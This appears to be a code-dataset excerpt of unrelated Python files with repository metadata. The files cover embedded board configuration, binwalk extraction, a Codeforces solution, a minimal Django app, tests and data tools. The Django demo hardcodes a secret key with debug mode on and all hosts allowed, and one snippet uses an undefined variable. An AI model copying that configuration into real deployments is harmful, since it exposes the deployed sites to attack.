] | permissive | fb321/gfx | b865539ea6acd9c99d11a3968424ae03b5dea438 | e59a8d65ef77d4b017fdc523305d4d29a066d92a | refs/heads/master | 2020-06-27T14:20:24.209933 | 2019-07-31T22:01:05 | 2019-07-31T22:01:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,346 | py | # coding: utf-8
##############################################################################
# Copyright (C) 2018 Microchip Technology Inc. and its subsidiaries.
#
# Subject to your compliance with these terms, you may use Microchip software
# and any derivatives exclusively with Microchip products. It is your
# responsibility to comply with third party license terms applicable to your
# use of third party software (including open source software) that may
# accompany Microchip software.
#
# THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
# EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
# WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
# PARTICULAR PURPOSE.
#
# IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
# INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
# WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
# BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
# FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
# ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
# THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
##############################################################################
componentsIDTable = ["HarmonyCore", "gfx_legato", "gfx_disp_mxt_cpro_320x480", "le_gfx_driver_ili9488", "sys_input", "gfx_maxtouch_controller"]
autoConnectTable = [["le_gfx_driver_ili9488", "Graphics Display", "gfx_disp_mxt_cpro_320x480", "gfx_display"],
["gfx_legato", "gfx_driver", "le_gfx_driver_ili9488", "gfx_driver_ili9488"],
["gfx_maxtouch_controller", "touch_panel", "gfx_disp_mxt_cpro_320x480", "touch_panel"]]
deactivateIDTable = ["FreeRTOS"]
execfile(Module.getPath() + "../common/pin_config.py")
execfile(Module.getPath() + "../common/bsp_utils.py")
execfile(Module.getPath() + "../common/display_utils.py")
pinConfigureFxn = configurePins
pinResetFxn = resetPins
#Add BSP support
execfile(Module.getPath() + "Support_BSP_SAM_E54_Curiosity_Ultra.py")
def enableConfigPins(bspID, configID, enable):
global pinConfigureFxn
if (enable == True):
print("enableCOnfig " + configID)
else:
print("disableCOnfig " + configID)
pinConfig = getBSPSupportNode(bspID, configID).getPinConfig()
if (enable == True):
pinConfigureFxn(pinConfig)
else:
pinResetFxn(pinConfig)
def enableConfig(bspID, configID, enable):
componentIDTable = getBSPSupportNode(bspID, configID).getComponentActivateList()
deactivateIDTable = getBSPSupportNode(bspID, configID).getComponentDeactivateList()
autoConnectTable = getBSPSupportNode(bspID, configID).getComponentAutoConnectList()
if (enable == True):
if (componentIDTable != None):
res = Database.activateComponents(componentIDTable)
if (deactivateIDTable != None):
res = Database.deactivateComponents(deactivateIDTable)
if (autoConnectTable != None):
res = Database.connectDependencies(autoConnectTable)
try:
getBSPSupportNode(bspID, configID).getEventCallbackFxn()("configure")
except:
print("No event callback for " + bspID + " configID.")
elif (enable == False):
if (componentIDTable != None):
res = Database.deactivateComponents(componentIDTable)
try:
getBSPSupportNode(bspID, configID).getEventCallbackFxn()("unconfigure")
except:
print("No event callback for " + bspID + " configID.")
enableConfigPins(bspID, configID, enable)
def configureDisplayInterface(bspID, interface):
print("Configuring for " + str(interface) + " Interface.")
if (bspID == None):
print("No BSP used, will not configure")
else:
DisplayInterfaceList = getDisplayInterfaces(bspID)
if (DisplayInterfaceList != None):
if (str(interface) in DisplayInterfaceList):
for val in DisplayInterfaceList:
if (val != interface):
enableConfig(bspID, val, False)
enableConfig(bspID, interface, True)
else:
print(str(interface) + " display interface is not supported.")
def onDisplayInterfaceSelected(interfaceSelected, event):
bspID = getSupportedBSP()
newDisplayInterface= interfaceSelected.getComponent().getSymbolByID("DisplayInterface").getValue()
currDisplayInterface = interfaceSelected.getComponent().getSymbolByID("currDisplayInterface").getValue()
interfaceSelected.getComponent().getSymbolByID("currDisplayInterface").setValue(event["value"], 0)
configureDisplayInterface(bspID, str(newDisplayInterface))
def instantiateComponent(templateComponent):
global componentsIDTable
global autoConnectTable
global supportedBSPsIDList
#Check if a supported BSP is loaded
bspUsedKeyID = getSupportedBSP()
DisplayInterfaceList = getDisplayInterfaces(bspUsedKeyID)
#if there is no list, build the list from the interfaces for each supported BSP
if (DisplayInterfaceList == None):
DisplayInterfaceList = []
bspSupportedList = getSupportedBSPList()
for bsp in bspSupportedList:
DisplayInterfaceList += getDisplayInterfaces(bsp)
# Remove duplicates
DisplayInterfaceList = list(dict.fromkeys(DisplayInterfaceList))
DisplayInterface = templateComponent.createComboSymbol("DisplayInterface", None, DisplayInterfaceList)
DisplayInterface.setLabel("Display Interface")
DisplayInterface.setDescription("Configures the display controller interface to the maXTouch Curiosity Pro.")
DisplayInterface.setDependencies(onDisplayInterfaceSelected, ["DisplayInterface"])
DisplayInterface.setVisible(True)
# Shadow display interface symbol
currDisplayInterface = templateComponent.createComboSymbol("currDisplayInterface", None, DisplayInterfaceList)
currDisplayInterface.setVisible(False)
res = Database.activateComponents(componentsIDTable)
res = Database.connectDependencies(autoConnectTable)
res = Database.deactivateComponents(deactivateIDTable);
if (bspUsedKeyID != None):
DisplayInterface.setDefaultValue(getDefaultDisplayInterface(bspUsedKeyID))
currDisplayInterface.setDefaultValue(getDefaultDisplayInterface(bspUsedKeyID))
configureDisplayInterface(bspUsedKeyID, str(currDisplayInterface.getValue()))
else:
print("No BSP used, only software components are configured. Please add board-specific components.")
| [
"http://support.microchip.com"
] | http://support.microchip.com |
c32cacad1c1141e9755e500443ac092c49f4da39 | ece5f5355fd3c76af49e4912ceffade563617dae | /src/scripts/examples/extract_data.py | ce17dac6c330a9725fab5b778709fe6ad52497a9 | [
"MIT"
] | permissive | stevenchen0x01/binwalk | 5f1f3d79a0427e70858c8454f60fd46d5a82dbd1 | 023a25e1222cd4209d120bd752aa5c55e621ed2a | refs/heads/master | 2021-01-19T16:41:47.397994 | 2017-08-21T17:45:43 | 2017-08-21T17:45:43 | 101,019,328 | 1 | 0 | null | 2017-08-22T03:57:23 | 2017-08-22T03:57:23 | null | UTF-8 | Python | false | false | 839 | py | #!/usr/bin/env python
import sys
import binwalk
# Extracts and logs
for module in binwalk.scan(*sys.argv[1:], signature=True, quiet=True, extract=True):
print ("%s Results:" % module.name)
for result in module.results:
if module.extractor.output.has_key(result.file.path):
if module.extractor.output[result.file.path].extracted.has_key(result.offset):
print (
"Extracted '%s' at offset 0x%X from '%s' to '%s'" % (result.description.split(',')[0],
result.offset,
result.file.path,
str(module.extractor.output[result.file.path].extracted[result.offset])))
| [
"heffnercj@gmail.com"
] | heffnercj@gmail.com |
569e248140e15b1b5e02e5607a39007906d082fc | ea459bc6571b254f04fedb9262e297038773afe2 | /111_776A.py | b8d01b8351f7bc60fd6f5abd57c604e23a3162c4 | [] | no_license | ywtail/codeforces | 47da2564858e0c906aa715b3b8b76e6d41b76dd8 | 5c000124ff5ef1172494bc5c5dc252bcf8515ce1 | refs/heads/master | 2020-12-24T08:00:47.738455 | 2018-04-21T15:27:48 | 2018-04-21T15:27:48 | 59,407,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | # coding=utf-8
# 776A. A Serial Killer
a,b=raw_input().split()
n=int(raw_input())
print a,b
for i in range(n):
temp=raw_input().split()
if a==temp[0]:
a=temp[1]
if b==temp[0]:
b=temp[1]
print a,b
'''
input
ross rachel
4
ross joey
rachel phoebe
phoebe monica
monica chandler
output
ross rachel
joey rachel
joey phoebe
joey monica
joey chandler
input
icm codeforces
1
codeforces technex
output
icm codeforces
icm technex
题目地址:http://codeforces.com/problemset/problem/776/A
题目大意:第一行初始值,从第三行开始,将空格前面的字符串替换为后面的。
之前用replace做的,报错了。原因:假设现在有abk k,要将k替换成a,就会变成aba k,而不是替换单个字符k。
''' | [
"ywtail@gmail.com"
] | ywtail@gmail.com |
558a28d7a353b44934bab408ca1769ee54d76a03 | fb63d298e6e765b42cb9544695a69bd0c8cb544a | /app.py | e7affb6d0596256387ad24f22867591dbe0bbee0 | [
"MIT"
] | permissive | hirajanwin/Single-Page-Django-App | b33f1dfc6dd8048481577b9588908488de84873c | fe02a59784908161103b1ec8f6d0073c02f1d88f | refs/heads/master | 2022-12-30T23:17:35.517498 | 2020-10-20T22:36:06 | 2020-10-20T22:36:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | import sys
from django.conf import settings
from django.core.wsgi import get_wsgi_application
from django.http import HttpResponse
from django.urls import path
# https://docs.djangoproject.com/en/dev/topics/settings/#using-settings-without-setting-django-settings-module
settings.configure(
DEBUG=True,
SECRET_KEY = 'w^h13cf0p8fl^98raarj#-u$c6e!)l@1rl!+9j^a%rrb*8xpe3',
ALLOWED_HOSTS=['*'],
ROOT_URLCONF=__name__,
)
def home_view(request, *args, **kwargs):
return HttpResponse("<h1>Hello World</h1>")
def about_view(request, *args, **kwargs):
return HttpResponse("<h1>About World</h1>")
urlpatterns = [
path("", home_view),
path("about/", about_view)
]
application = get_wsgi_application()
if __name__ == "__main__":
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv) | [
"hello@teamcfe.com"
] | hello@teamcfe.com |
b09646433f33ef6fe4a3098d1f3e25f092a646f7 | b4eef8c2e03378328293bc41303879db3050bc98 | /watsondt/cybox/test/objects/win_semaphore_test.py | c9f3dd5987d2976f29a9397b387b63101f889b76 | [] | no_license | luisgf/watsondt | 18682a28397b27eece5ce8913ca66bc37c92e555 | 6b3b2f76be23e6a054a0188a02a93a5207099e55 | refs/heads/master | 2021-01-10T07:37:31.010055 | 2016-02-24T22:01:29 | 2016-02-24T22:01:29 | 52,477,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 912 | py | # Copyright (c) 2015, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import unittest
from cybox.objects.win_semaphore_object import WinSemaphore
from cybox.test.objects import ObjectTestCase
class TestWinSemaphore(ObjectTestCase, unittest.TestCase):
object_type = "WindowsSemaphoreObjectType"
klass = WinSemaphore
_full_dict = {
'handle': {
'id': 1234,
'name': "MyHandle",
'type': "Window",
'object_address': 0xdeadbeef,
'access_mask': 0x70000000,
'pointer_count': 3,
'xsi:type': "WindowsHandleObjectType",
},
'security_attributes': "Attributes go here",
'named': False,
'current_count': 100,
'maximum_count': 250,
'name': "A Test",
'xsi:type': object_type
}
if __name__ == "__main__":
unittest.main()
| [
"luisgf@luisgf.es"
] | luisgf@luisgf.es |
59527ef34011ce59e50f0ca795f7ae991f6efd07 | 9b142372020cd0e456ba07a08ce23d2d93804bec | /new_practice/functional_programming/function_enumerate.py | 6ac290355cb1191dadfb90021ee5f3be13453e72 | [] | no_license | pavel-malin/new_practices | 2f287a3477cc1cb4c1d0d668903a8e036e383b66 | c078fbfac0212bc258550023cc71cb25f0e4f533 | refs/heads/master | 2020-08-01T07:14:55.594507 | 2019-10-25T10:19:09 | 2019-10-25T10:19:09 | 210,911,049 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | # Without enumerate
i = 0
while i < len(mylist):
print("Item %d: %s" % (i, mylist[i]))
i += 1
# With enumerate
for i, item in enumerate(mylist):
print("Item %d: %s" % (i, item))
| [
"kurchevskijpavel@gmail.com"
] | kurchevskijpavel@gmail.com |
a9b66394400c72c14bdb93febdfe8545e8a5e943 | 487eac14c3fcc5cd6be3bb9e10e765a18edd564a | /src/python/twitter/common/python/dependency.py | 81c76ee7fe40225523c86d818502f0c145bd774f | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | billwei/commons | 4a5ae6b183f871f4670b5a5d9c737824bac0623d | c980481f2627c336c7b75d57824c23d368f3ba43 | refs/heads/master | 2021-01-17T22:07:50.800151 | 2012-01-28T03:17:57 | 2012-01-28T03:17:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,985 | py | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import os
import types
import zipfile
from twitter.common.python.dirwrapper import PythonDirectoryWrapper
from twitter.common.python.reqbuilder import ReqBuilder
from setuptools.package_index import EXTENSIONS as VALID_SOURCE_EXTENSIONS
"""
TODO(wickman): I don't like how this is factored right now, though it's an
improvement over what we used to have.
In the next iteration let's do:
Make PythonDependency a base class for:
PythonEggDependency <= .egg(s)
PythonTgzDependency <= .tgz
PythonReqDependency <= pkg_resources.Requirement
PythonDependency exports the API:
input_files()
activate(path) (idempotent) => .egg heads
We then encode PythonDependency blobs directly into the manifest to make the
dependencies more explicit than just autodetecting a bunch of ".egg" directories
in the "dependency" fileset of the chroot.
"""
class PythonDependency(object):
class UnpackingError(Exception): pass
class NotFoundError(Exception): pass
class BuildError(Exception): pass
class RequirementError(Exception): pass
DEFAULT_URI = "http://pypi.python.org"
@staticmethod
def from_file(filename):
if filename.lower().endswith('.egg'):
return PythonDependency.from_egg(filename)
else:
for suffix in VALID_SOURCE_EXTENSIONS:
if filename.lower().endswith(suffix):
return PythonDependency.from_source(filename)
raise PythonDependency.RequirementError(
'Unrecognized Python dependency file format: %s!' % filename)
# TODO(wickman): This arguably shouldn't belong -- we should probably
# have the bootstrapper interface with ReqFetcher so that
# install_requirements never goes out to the network w/o our knowledge.
@staticmethod
def from_req(requirement):
dists = ReqBuilder.install_requirement(requirement)
return PythonDependency.from_distributions(*list(dists))
@staticmethod
def from_source(filename):
if not os.path.exists(filename):
raise PythonDependency.NotFoundError(
"Could not find PythonDependency target %s!" % filename)
dists = ReqBuilder.install_requirement(filename)
return PythonDependency.from_distributions(*list(dists))
@staticmethod
def from_distributions(*distributions):
if not distributions:
raise PythonDependency.BuildError(
"Cannot extract PythonDependency from empty distribution!")
else:
if any(not dist.location.endswith('.egg') for dist in distributions):
raise PythonDependency.RequirementError(
'PythonDependency.from_distribution requires Egg distributions!')
return PythonDependency.from_eggs(*[dist.location for dist in distributions])
@staticmethod
def from_eggs(*egg_paths):
return PythonDependency(egg_paths)
def __init__(self, eggheads):
"""
eggheads = List of files or directories that end with ".egg" and point to
valid eggs.
Not intended to be called directly. Instead use the from_* factory methods.
"""
if not isinstance(eggheads, (types.ListType, types.TupleType)):
raise ValueError('Expected eggs to be a list of filenames! Got %s' % type(eggheads))
self._eggs = {}
for egg in eggheads:
self._eggs[os.path.basename(egg)] = PythonDirectoryWrapper.get(egg)
def files(self):
"""
Iterator that yields
(filename, content)
Where filename is going to be:
my_egg.egg if a file egg
my_egg.egg/EGG-INFO/stuff1.txt if a directory egg or unzipsafe egg
"""
for egg, wrapper in self._eggs.iteritems():
all_files = sorted(wrapper.listdir())
if 'EGG-INFO/zip-safe' in all_files and wrapper.is_condensed():
with open(wrapper.path(), 'r') as fp:
yield (egg, fp.read())
else:
for filename in all_files:
# do space optimization where we skip .pyc/.pyo if the .py is already included
if (filename.endswith('.pyc') or filename.endswith('.pyo')) and (
'%s.py' % filename[:-4] in all_files):
continue
yield (os.path.join(egg, filename), wrapper.read(filename))
| [
"jsirois@twitter.com"
] | jsirois@twitter.com |
8dff5822ab1b4f7f2607db2d045a4a5e89fd310a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_usage.py | a9c1c291214946757c3b7d41f1297ba952011a44 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py |
#calss header
class _USAGE():
def __init__(self,):
self.name = "USAGE"
self.definitions = [u'the way a particular word in a language, or a language in general, is used: ', u'the way something is treated or used: ', u'the bad and unfair way someone treats you: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
ca7907b8d1400a229dd989b9c40e5c385916658d | f9bd7c1475b2ee956ca4bdbd6a35071b3c5ae5d9 | /test/sorted_array_to_bst.py | 4ef9c8088b51814db0c1437a23f8bc438bcbfd71 | [
"MIT"
] | permissive | gsathya/dsalgo | 7f984c1288f1894cf458ec4bafb6291a4e239c8d | 61c89ec597ced3e69bfbb438fd856c8fc5f20aba | refs/heads/master | 2020-05-18T02:28:18.390769 | 2014-10-16T19:32:00 | 2014-10-16T19:32:00 | 16,241,162 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | import unittest
from lib import bst
from algo import sorted_array_to_bst
class TestSortedArrayToBST(unittest.TestCase):
def setUp(self):
self.bst = bst.BST()
def test_add(self):
vals = range(7)
sorted_array_to_bst.convert(vals, 0, len(vals)-1, self.bst)
| [
"gsathya.ceg@gmail.com"
] | gsathya.ceg@gmail.com |
9674cf7ffd5bfb6e9597610c956057aa62ddfc87 | 0693cce8efbeca806f4551c22dce60d5f392c5c9 | /contentful_management/editor_interface.py | b3d213115f887570c052d167d231e3f697e8a7df | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | timwis/contentful-management.py | 2dc4b7389ca2136ee2a12b89812b18ef2a347e67 | d71a0e18205d1de821b41c7225e8244e786be7f3 | refs/heads/master | 2021-06-28T12:04:58.130393 | 2017-08-10T16:30:09 | 2017-08-10T16:32:50 | 103,517,328 | 0 | 0 | null | 2017-09-14T10:04:48 | 2017-09-14T10:04:48 | null | UTF-8 | Python | false | false | 1,645 | py | from .resource import Resource
"""
contentful_management.editor_interface
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module implements the EditorInterface class.
API reference: https://www.contentful.com/developers/docs/references/content-delivery-api/#/reference/editor-interfaces
:copyright: (c) 2017 by Contentful GmbH.
:license: MIT, see LICENSE for more details.
"""
class EditorInterface(Resource):
"""
API reference: https://www.contentful.com/developers/docs/references/content-delivery-api/#/reference/editor-interfaces
"""
def __init__(self, item, **kwargs):
super(EditorInterface, self).__init__(item, **kwargs)
self.controls = item.get('controls', [])
@classmethod
def base_url(self, space_id, content_type_id, **kwargs):
"""
Returns the URI for the editor interface.
"""
return "spaces/{0}/content_types/{1}/editor_interface".format(
space_id,
content_type_id
)
@classmethod
def update_attributes_map(klass):
"""
Attributes for object mapping.
"""
return {'controls': []}
def to_json(self):
"""
Returns the JSON representation of the editor interface.
"""
result = super(EditorInterface, self).to_json()
result.update({'controls': self.controls})
return result
def _update_url(self):
return self.__class__.base_url(
self.space.id,
self.content_type.id
)
def __repr__(self):
return "<EditorInterface id='{0}'>".format(
self.sys.get('id', '')
)
| [
"david.litvakb@gmail.com"
] | david.litvakb@gmail.com |
6f51613fafe60c7d57c562aac5a76f18afd45aff | 60f2d047db9433b1fa211cec5e6dbdee961d0e39 | /sina_data/command.py | e8f434d3f012e57f72c457edf0ed845acb1fbcf0 | [] | no_license | cheatm/DataCollector | a43071868bcac8fde64875332c0f597e46c5e736 | 8daab8673b5f07939e7073055f916d260727ec47 | refs/heads/master | 2020-12-02T22:53:14.085439 | 2017-07-06T09:47:36 | 2017-07-06T09:47:36 | 96,197,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,258 | py | # encoding:utf-8
from file_manager import FileManger
import json
from fxdayu_data import MongoHandler
import pandas as pd
import os
import logger
# ensure_tick # 按tick文件更新索引
# update_index # 更新索引日期
# emend_db # 按数据库更新索引
# write_db # 根据索引写数据库
# req_tick_data # 根据索引向MQ提交数据下载任务
# ensure_index # 按tick和数据库更新索引
# download_tick # 监听MQ下载tick数据
try:
root = os.environ.get("SINADATA")
fm = FileManger(root)
handler = MongoHandler.params(**json.load(open(root+'/mongo.json')))
except:
root = None
fm = None
handler = None
def write_db():
import index_db
index_db.write_db(fm, handler, logger.get_time_rotate("WriteDBLog"))
def download_tick():
import save_tick
from worker import Consumer, TornadoWorker
import MQconfig
TornadoWorker.params(
Consumer(save_tick.callback, MQconfig.queue, MQconfig.consume)
).start()
def emend_db(include_2=False):
import index_db
log = logger.get_time_rotate("CommandLog")
db = handler.client[handler.db]
for code in fm.find_stocks():
try:
index_db.do_scan(code, fm, db[code], include_2)
log.info("EmendDB {} success".format(code))
except Exception as e:
log.error("EmendDB {} fail {}".format(code, e))
def ensure_tick():
log = logger.get_time_rotate("CommandLog")
for code in fm.find_stocks():
result = fm.ensure_tick(code)
if isinstance(result, pd.DataFrame):
log.info("Ensure {} success".format(code))
elif isinstance(result, Exception):
log.error("Ensure {} fail {}".format(code, result))
def update_index(update_bench=True):
log = logger.get_time_rotate("CommandLog")
benchmark = fm.get_benchmark(update_bench)
for code in fm.find_stocks():
result = fm.update_stock(code, benchmark.index)
if isinstance(result, pd.DataFrame):
log.info("UpdateIndex {} success".format(code))
elif isinstance(result, Exception):
log.error("UpdateIndex {} fail {}".format(code, result))
def req_tick_data():
from worker import TornadoWorker, Producer
import MQconfig
import req_data
TornadoWorker.params(
Producer(req_data.check(), MQconfig.exchange, MQconfig.queue, MQconfig.bind)
).start()
def ensure_index(include_2=False):
ensure_tick()
emend_db(include_2)
import click
@click.group(chain=True)
def command():
pass
@command.command()
def tick():
"""read tick file and update index"""
ensure_tick()
@command.command()
@click.option("--bench", is_flag=True, help='update benchmark before update stock index')
def update(bench):
"""
update stock index by benchmark
"""
update_index(bench)
@command.command()
def require():
"""read index and post DataRequestMessage to MQ"""
req_tick_data()
@command.command()
def write():
"""read index and write data into db"""
write_db()
@command.command()
@click.option("--include2", is_flag=True, help="check all data in index")
def emend(include2):
"""
read db and update index
--include2: check all log
"""
emend_db(include2)
from datetime import datetime
@command.command()
@click.option("--start", default='2012-06-01')
@click.option("--end", default=datetime.now().strftime("%Y-%m-%d"))
@click.option("--stock_index", is_flag=True)
def create(start, end, stock_index):
"""create index dir"""
os.makedirs(root+'/')
os.makedirs(root+'/Log/')
fm = FileManger(root)
benchmark = fm.create_benchmark(start, end)
print "create benchmark {}".format(fm.benchmark)
import json
codes = json.load(open('stocks.json'))
json.dump(codes, open('stocks.json', 'w'))
if stock_index:
for code in codes:
try:
fm.create_stock(code, benchmark.index)
print "create index {}".format(code)
except:
print "create index {} failed".format(code)
@command.command()
def download():
"""activate download listener to MQ"""
download_tick()
if __name__ == '__main__':
command()
| [
"862786917@qq.com"
] | 862786917@qq.com |
7b16ff529324924577f1dd439cee9d8a24bdad19 | 72ea8dbdbd68813156b76c077edb5a3806bf42ab | /synapse/tools/melder.py | d20397c0808530674c4fbcc272855608dc5de77a | [
"Apache-2.0"
] | permissive | williballenthin/synapse | 5c6f197f5a3cb3566c48dc444770592e89d4152a | 799854da814b79d6631e5cc2796c347bf4a80ce7 | refs/heads/master | 2020-12-24T14:19:12.530026 | 2017-03-16T20:30:38 | 2017-03-16T20:30:38 | 41,521,212 | 2 | 0 | null | 2015-08-28T02:01:50 | 2015-08-28T02:01:50 | null | UTF-8 | Python | false | false | 1,619 | py | import sys
import msgpack
import argparse
import synapse.mindmeld as s_mindmeld
from synapse.common import *
def main(argv):
'''
Command line tool for MindMeld construction/manipulation.
'''
p = argparse.ArgumentParser(prog='melder')
p.add_argument('meldfile',help='meld file path')
p.add_argument('--add-pypath', dest='pypaths', default=[], action='append', help='add a python path to the meld')
p.add_argument('--add-datfiles', dest='datfiles', action='store_true', help='when adding pypath, include datfiles')
p.add_argument('--dump-info', dest='dumpinfo', action='store_true', help='dump the entire meld info dictionary to stdout')
p.add_argument('--set-name', dest='name', default=None, help='set meld name (ie, "foolib")')
p.add_argument('--set-version', dest='version', default=None, help='set meld version (ie, 8.2.30)')
opts = p.parse_args(argv)
meldinfo = {}
if os.path.isfile(opts.meldfile):
with open(opts.meldfile,'rb') as fd:
meldinfo = msgpack.load(fd,encoding='utf8')
meld = s_mindmeld.MindMeld(**meldinfo)
if opts.version:
meld.setVersion(vertup(opts.version))
if opts.name:
meld.setName(opts.name)
for pypath in opts.pypaths:
meld.addPyPath(pypath,datfiles=opts.datfiles)
meldinfo = meld.getMeldDict()
if opts.dumpinfo:
print(repr(meldinfo))
meldbyts = msgpack.dumps( meld.getMeldDict(), encoding='utf8', use_bin_type=True )
with open(opts.meldfile,'wb') as fd:
fd.write(meldbyts)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| [
"invisigoth@kenshoto.com"
] | invisigoth@kenshoto.com |
0e51fba2f80f46ac06c1128a50b217af17862cff | 3fd3da4f11a251cc43d44d1d61ff2ffe5c82a4ce | /dlp/common/img_util.py | 8fafd5919c6f8c89627cc176e0b8598124df38f2 | [] | no_license | dumpinfo/TsBook | d95faded917bce3e024e77ff06afd30717ed9ef4 | 8fadfcd2ebf935cd49784fd27d66b2fd9f307fbd | refs/heads/master | 2023-05-27T07:56:24.149421 | 2019-07-31T20:51:52 | 2019-07-31T20:51:52 | 198,481,031 | 1 | 3 | null | 2023-05-22T21:13:31 | 2019-07-23T17:47:19 | Jupyter Notebook | UTF-8 | Python | false | false | 1,764 | py | from PIL import Image as image
def get_scaled_dims(org_w, org_h, dest_w, dest_h):
scale = dest_w / org_w
dh = scale * org_h
new_w = dest_w
new_h = dest_h
if dh < dest_h:
new_h = dh
else:
scale = dest_h / org_h
new_w = scale * org_w
return int(new_w), int(new_h)
def get_resized_dim(ori_w, ori_h, dest_w, dest_h):
widthRatio = heightRatio = None
ratio = 1
if (ori_w and ori_w > dest_w) or (ori_h and ori_h > dest_h):
if dest_w and ori_w > dest_w:
widthRatio = float(dest_w) / ori_w #正确获取小数的方式
if dest_h and ori_h > dest_h:
heightRatio = float(dest_h) / ori_h
if widthRatio and heightRatio:
if widthRatio < heightRatio:
ratio = widthRatio
else:
ratio = heightRatio
if widthRatio and not heightRatio:
ratio = widthRatio
if heightRatio and not widthRatio:
ratio = heightRatio
newWidth = int(ori_w * ratio)
newHeight = int(ori_h * ratio)
else:
newWidth = ori_w
newHeight = ori_h
return newWidth, newHeight
def resize_img_file(org_img, dest_img, dest_w, dest_h, save_quality=35):
print('resize the image')
im = image.open(org_img)
print('im={0}'.format(im))
ori_w, ori_h = im.size
newWidth, newHeight = get_resized_dim(ori_w, ori_h, dest_w, dest_h)
im.resize((newWidth,newHeight),image.ANTIALIAS).save(dest_img,quality=save_quality)
def resize_img(im, dest_w, dest_h, save_quality=35):
ori_w, ori_h = im.size
newWidth, newHeight = get_resized_dim(ori_w, ori_h, dest_w, dest_h)
return im.resize((newWidth,newHeight),image.ANTIALIAS)
| [
"twtravel@126.com"
] | twtravel@126.com |
8beda32bbb13b6f511b0c1daa4f271163ee84276 | b820ed3fba2c851715905116ef437843b3532b57 | /owners/stores/admin.py | 19525f46b5d315117deb9e8b7fb84b6557820ef8 | [] | no_license | dev-fahim/retail_app | f88ea96dd4b95516598f4fceedca31a02e8eaeb3 | 41438560a8dac3c1f3cfd966373230dc2c3af9ff | refs/heads/master | 2022-12-11T06:05:29.023809 | 2019-01-12T17:01:27 | 2019-01-12T17:01:27 | 156,075,067 | 0 | 0 | null | 2022-11-22T03:06:03 | 2018-11-04T11:27:55 | Python | UTF-8 | Python | false | false | 149 | py | from django.contrib import admin
from owners.stores.models import OwnerStoreModel
# Register your models here.
admin.site.register(OwnerStoreModel)
| [
"fahim6668@gmail.com"
] | fahim6668@gmail.com |
ca1f46c68d3b1cfef20fcac79a1a882105478872 | fbbe424559f64e9a94116a07eaaa555a01b0a7bb | /Tensorflow_Pandas_Numpy/source3.6/tensorflow/contrib/kfac/python/ops/utils_lib.py | ddbb4485ce6967082f1844c6d798c078f1cc303b | [
"MIT"
] | permissive | ryfeus/lambda-packs | 6544adb4dec19b8e71d75c24d8ed789b785b0369 | cabf6e4f1970dc14302f87414f170de19944bac2 | refs/heads/master | 2022-12-07T16:18:52.475504 | 2022-11-29T13:35:35 | 2022-11-29T13:35:35 | 71,386,735 | 1,283 | 263 | MIT | 2022-11-26T05:02:14 | 2016-10-19T18:22:39 | Python | UTF-8 | Python | false | false | 1,520 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,wildcard-import
from tensorflow.contrib.kfac.python.ops.utils import *
from tensorflow.python.util.all_util import remove_undocumented
